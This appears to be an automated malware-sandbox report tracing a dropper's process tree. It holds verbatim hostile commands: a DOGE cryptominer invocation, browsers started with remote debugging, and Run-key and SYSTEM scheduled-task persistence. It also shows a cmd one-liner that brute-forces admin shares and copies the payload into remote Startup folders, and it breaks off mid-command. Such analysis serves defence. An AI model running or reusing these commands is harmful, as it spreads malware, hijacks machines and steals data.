111 PID 4476 wrote to memory of 5364 4476 silk.exe 111 PID 4476 wrote to memory of 5364 4476 silk.exe 111 PID 5364 wrote to memory of 2556 5364 silk.tmp 112 PID 5364 wrote to memory of 2556 5364 silk.tmp 112 PID 5364 wrote to memory of 2556 5364 silk.tmp 112 PID 4844 wrote to memory of 3640 4844 New Text Document.exe 113 PID 4844 wrote to memory of 3640 4844 New Text Document.exe 113 PID 4844 wrote to memory of 3640 4844 New Text Document.exe 113 PID 3640 wrote to memory of 5200 3640 IMG001.exe 114 PID 3640 wrote to memory of 5200 3640 IMG001.exe 114 PID 3640 wrote to memory of 5200 3640 IMG001.exe 114 PID 5200 wrote to memory of 5520 5200 cmd.exe 116 PID 5200 wrote to memory of 5520 5200 cmd.exe 116 PID 5200 wrote to memory of 5520 5200 cmd.exe 116 PID 4844 wrote to memory of 5332 4844 New Text Document.exe 117 PID 4844 wrote to memory of 5332 4844 New Text Document.exe 117 PID 5332 wrote to memory of 3444 5332 z.exe 56 PID 4844 wrote to memory of 3816 4844 New Text Document.exe 118 PID 4844 wrote to memory of 3816 4844 New Text Document.exe 118 PID 1796 wrote to memory of 412 1796 lem.exe 119 PID 1796 wrote to memory of 412 1796 lem.exe 119 PID 1796 wrote to memory of 412 1796 lem.exe 119 PID 3976 wrote to memory of 2112 3976 untitled2.exe 120 PID 3976 wrote to memory of 2112 3976 untitled2.exe 120 PID 3816 wrote to memory of 5124 3816 steam.exe 121 PID 3816 wrote to memory of 5124 3816 steam.exe 121 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 7116 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3444 -
C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"2⤵
- Downloads MZ/PE file
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Users\Admin\AppData\Local\Temp\a\g.exe"C:\Users\Admin\AppData\Local\Temp\a\g.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Users\Admin\AppData\Local\Temp\a\g.exe"C:\Users\Admin\AppData\Local\Temp\a\g.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 760 -s 8124⤵
- Program crash
PID:4800
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\lem.exe"C:\Users\Admin\AppData\Local\Temp\a\lem.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵PID:412
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
PID:6380 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff0670cc40,0x7fff0670cc4c,0x7fff0670cc586⤵PID:6808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2324,i,9334370423415751680,3820983920454728945,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2320 /prefetch:26⤵PID:6340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1752,i,9334370423415751680,3820983920454728945,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2464 /prefetch:36⤵PID:4808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1848,i,9334370423415751680,3820983920454728945,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2568 /prefetch:86⤵PID:5880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,9334370423415751680,3820983920454728945,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3120 /prefetch:16⤵
- Uses browser remote debugging
PID:1220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,9334370423415751680,3820983920454728945,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3180 /prefetch:16⤵
- Uses browser remote debugging
PID:5160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4468,i,9334370423415751680,3820983920454728945,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4464 /prefetch:16⤵
- Uses browser remote debugging
PID:6456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4300,i,9334370423415751680,3820983920454728945,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3612 /prefetch:86⤵PID:6948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4188,i,9334370423415751680,3820983920454728945,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4888 /prefetch:86⤵PID:7332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5008,i,9334370423415751680,3820983920454728945,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5020 /prefetch:86⤵PID:5248
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
PID:1620 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff0670cc40,0x7fff0670cc4c,0x7fff0670cc586⤵PID:5308
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
PID:6192 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff069846f8,0x7fff06984708,0x7fff069847186⤵PID:2848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,11595395774816975395,16823926768604963534,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:26⤵PID:3040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,11595395774816975395,16823926768604963534,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:36⤵PID:8064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,11595395774816975395,16823926768604963534,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:86⤵PID:5308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,11595395774816975395,16823926768604963534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:16⤵
- Uses browser remote debugging
PID:8128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,11595395774816975395,16823926768604963534,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:16⤵
- Uses browser remote debugging
PID:7228
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
PID:5420
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\StCl.exe"C:\Users\Admin\AppData\Local\Temp\a\StCl.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356
-
-
C:\Users\Admin\AppData\Local\Temp\a\untitled2.exe"C:\Users\Admin\AppData\Local\Temp\a\untitled2.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /f /im os-setup-service.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /f /im ffmpeg.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /f /im python.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3968
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /f /im browser_broker.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5064
-
-
C:\Users\Admin\AppData\Local\Temp\a\minerlol\cpuminer-avx.exe"C:\Users\Admin\AppData\Local\Temp\a\minerlol\cpuminer-avx.exe" -a minotaurx -o stratum+tcp://minotaurx.na.mine.zpool.ca:7019 -u DMgypy9jqhGHL1TbHGHrBnEZxoFsM3tGiy -p c=DOGE4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2112
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\random.exe"C:\Users\Admin\AppData\Local\Temp\a\random.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5360
-
-
C:\Users\Admin\AppData\Local\Temp\a\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\a\Bjkm5hE.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5652 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
PID:6432 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffeff33cc40,0x7ffeff33cc4c,0x7ffeff33cc585⤵PID:7316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1896,i,9214132942793886766,18375446588124508429,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=1892 /prefetch:25⤵PID:5748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,9214132942793886766,18375446588124508429,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2368 /prefetch:35⤵PID:6888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2168,i,9214132942793886766,18375446588124508429,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2404 /prefetch:85⤵PID:7000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,9214132942793886766,18375446588124508429,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3124 /prefetch:15⤵
- Uses browser remote debugging
PID:5740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,9214132942793886766,18375446588124508429,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3156 /prefetch:15⤵
- Uses browser remote debugging
PID:3240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4424,i,9214132942793886766,18375446588124508429,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4532 /prefetch:15⤵
- Uses browser remote debugging
PID:7592
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
PID:7536 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff06e646f8,0x7fff06e64708,0x7fff06e647185⤵PID:4828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,15289683762246289363,8849298478585039920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:25⤵PID:760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,15289683762246289363,8849298478585039920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:35⤵PID:3852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,15289683762246289363,8849298478585039920,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:85⤵PID:7152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,15289683762246289363,8849298478585039920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:15⤵
- Uses browser remote debugging
PID:7696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,15289683762246289363,8849298478585039920,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:15⤵
- Uses browser remote debugging
PID:5384
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\gd2va" & exit4⤵PID:6488
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
PID:1952
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\silk.exe"C:\Users\Admin\AppData\Local\Temp\a\silk.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Users\Admin\AppData\Local\Temp\is-KE0PM.tmp\silk.tmp"C:\Users\Admin\AppData\Local\Temp\is-KE0PM.tmp\silk.tmp" /SL5="$1A0224,5943295,56832,C:\Users\Admin\AppData\Local\Temp\a\silk.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5364 -
C:\Users\Admin\AppData\Local\Old Data Eraser 5.14.7.1119\olddataeraser19.exe"C:\Users\Admin\AppData\Local\Old Data Eraser 5.14.7.1119\olddataeraser19.exe" -i5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2556
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe"C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3640 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5200 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5520
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2964
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵PID:5712
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe5⤵PID:1360
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe6⤵
- Kills process with taskkill
PID:6088
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"5⤵PID:6976
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ5⤵PID:7684
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ6⤵PID:6820
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"5⤵PID:2488
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:5388
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"5⤵PID:5624
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:7576
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0005⤵
- Power Settings
PID:5308 -
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 06⤵
- Power Settings
PID:7672
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 06⤵
- Power Settings
PID:7996
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0006⤵
- Power Settings
PID:6200
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1605& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" 